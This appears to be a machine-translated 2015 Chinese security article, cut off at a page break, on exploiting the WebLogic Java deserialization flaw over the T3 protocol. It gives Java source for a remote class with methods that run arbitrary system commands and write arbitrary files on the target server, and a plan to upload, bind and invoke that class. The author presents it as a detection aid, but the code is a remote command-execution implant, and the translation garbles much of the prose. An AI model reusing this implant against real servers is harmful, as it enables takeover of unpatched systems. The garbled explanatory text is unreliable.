Java deserialization vulnerability of the weblogic local use to achieve article-vulnerability warning-the black bar safety net

ID MYHACK58:62201570321
Type myhack58
Reporter rebeyond
Modified 2015-12-24T00:00:00


weblogic in the domestic scope of application more widely, supporting many of the company's core business, it has not put the weblogic to use the tool to publish it. However, many recent Party a friend asked me if I had a convenient tool to detect their companies deployed in the network of weblogic, in fact, this vulnerability was published for so long that maintenance personnel are aware of the vulnerabilities of the hazards, just open online detection method ease of use not too good, detect up more trouble, so there is this article. 0×0 1 ideas Because weblogic will put the exceptions directly print to the server console, so in jboss by exception package echo method in weblogic does not apply a reference to another article: Java deserialization vulnerability to execute commands echo to achieve and Exploit. But weblogic has a more convenient way, weblogic is through the T3 Protocol to transport the serialized class, then we can through the T3 Protocol to implement the exploit and server communication, because the weblogic T3 Protocol and WEB protocols share the same port, so long as can access the weblogic, you can use, no need to load a remote class, so the server can connected to the external network is not required. On the T3 Protocol in detail, this is no longer repeat, if the reader is not familiar with it doesn't matter, just know that the T3 Protocol allows the client to remotely invoke the service end of the class. So we organize some thoughts: (1) First, we are created in the local one can be used for our remote calls to the class and compile. (2)put the compiled class is uploaded to the server. (3 in the remote server is registered on and bind our upload class. (4 local remote invocation of our class, the implementation we want to execute the command. (5)execution is completed, the counter register the remote class. (6)delete the class file. 0×0 2 (1)create our remote class, in the class implement two methods, executing the system command to get back to the display and upload the text file, the class must inherit java. rmi. The Remote interface, The code is as follows: Interface: public interface InitApp extends java. rmi. Remote { String runCmd(String cmd) ; String putFile(String Content,String Path); } Implementation class: public class InitAppImpl implements InitApp{ private String name; public InitAppImpl(String s) throws RemoteException { super(); name = s; } /* * Returns a string. * * @return results of cmd * / public String runCmd(String cmd) { try { Process proc = Runtime. getRuntime(). exec(cmd); BufferedReader br = new BufferedReader(new InputStreamReader(proc. getInputStream())); StringBuffer sb = new StringBuffer(); String line; while ((line = br. readLine()) != null) { sb. append(line). append("\n"); } return sb. toString(); } catch(Exception e) { return e. getMessage(); } } public String putFile(String Content,String Path) { try { FileOutputStream fo=new FileOutputStream(Path); fo. write(Content. getBytes()); fo. close(); File f=new File(Path); if (f. exists()) { return Path+"upload success! Has been verified to exist."; } else { return Path+"upload success!"; }

} catch(Exception e) { return e. getMessage(); }


public static void main(String args[]) throws Exception { try { InitAppImpl obj = new InitAppImpl("RemoteClass"); Context ctx = new InitialContext(); ctx. bind("RemoteClass", obj); } catch (Exception e) { System. err. println("RemoteClass: an exception occurred:");

[1] [2] [3] [4] next